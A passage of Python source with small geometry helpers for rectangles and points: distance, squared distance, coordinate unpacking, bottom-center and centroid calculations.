return math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)
def get_rect_values(rect):
# y1, x1, y2, x2
return rect[0], rect[1], rect[2], rect[3]
def get_rect_pnts(rect):
# p1, p2
return (rect[1], rect[0]), (rect[3], rect[2])
def get_rect(p1, p2):
return [p1[1], p1[0], p2[1], p2[0]]
def get_rect_bottom_center(rect):
r1 = rect[1]
r2 = rect[2]
r3 = rect[3]
return int(r1 + (r3 - r1) * 0.5), r2 # bottom center
def get_dist_sq(p1, p2):
d1 = p2[0] - p1[0]
d2 = p2[1] - p1[1]
return d1 * d1 + d2 * d2
def get_center_int(pnts):
x = 0
y = 0
for pnt in pnts:
x += pnt[0]
y += pnt[1]
length = float(len(pnts))
return [int(x / length), int(y / length)]
| StarcoderdataPython |